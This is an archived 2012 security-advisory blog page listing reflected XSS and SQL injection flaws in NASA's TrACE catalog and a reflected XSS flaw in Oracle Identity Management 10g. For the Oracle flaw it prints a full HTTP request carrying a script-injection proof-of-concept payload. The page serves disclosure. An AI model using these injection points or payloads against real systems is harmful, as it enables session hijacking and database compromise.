Archive for October, 2012

NASA Tri-Agency Climate Education (TrACE) Multiple Vulnerabilities

The Tri-Agency Climate Education (TrACE) Catalog provides search and browse access to a catalog of educational products and resources. TrACE focuses on climate education resources that have been developed by initiatives funded through NASA, NOAA, and NSF, comprising a tri-agency collaboration around climate education.

The application suffers from a reflected cross-site scripting vulnerability when input is passed to the ‘product_id’, ‘pi’, ‘project_id’ and ‘funder’ GET parameters in ‘trace_results.php’ script which is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site. The application also suffers from an SQL Injection vulnerabilities when input is passed to the ‘product_id’ and ‘grade’ GET parameters in ‘trace_results.php’ script which is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Advisories:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5111.php
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5112.php

Oracle Identity Management 10g (username) XSS POST Injection Vulnerability

Oracle Identity Management suffers from a reflected XSS POST Injection vulnerability when parsing user input to the ‘username’ parameter via POST method thru ‘/usermanagement/forgotpassword/index.jsp’ script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

HTTP Request Headers:
----------------------

POST /usermanagement/forgotpassword/index.jsp HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: JSESSIONID=996b1e1dbc2cdec0e74c96f440780cfce507dce8144.e3eKa3
iTaN0Le34RaNuLb3yKchn0n6jAmljGr5XDqQLvpAe; ORA_WX_SESSION="6F35B41473025957B17F02F62855B522D4E22D7B-1#2";
Location=external; portal=9.0.3+en-us+us+AMERICA+CACA1F130AE0024EE043996B1DDC024E+
4D3F611B686669BF0BEC9DC4267652AC337EA1C5259A2168CF43540DE72E3BD5E
F1F589B40A6CD4E7007EB4D085EBD0681A1B2515CB22B5BED14922088
923D86B742E69FDA5D716C437D416C5F5B26049DC71083712AA9EA;
MODPLSQL_TRC=ReqId:11a179::PID:856d5bb0

btnSubmit=SUBMIT
username="><script>alert('XSS');</script>

HTTP Response Headers:
-----------------------

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: ORA_WX_SESSION="267FB4CAD2746E946102C01D527362A070E7D52C-1#2"; path=/
JSESSIONID=996b1e1dbc2cdec0e74c96f440780cfce507dce8144.e3eKa3iTaN0
Le34RaNuLb3yKchn0n6jAmljGr5XDqQLvpAe; path=/usermanagement; secure
Location=external;path=/;
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.2.2.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.2.1 (N;ecid=216172960764121113,1)
Content-Length: 3198
Date: Fri, 28 Sep 2012 21:39:00 GMT

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5110.php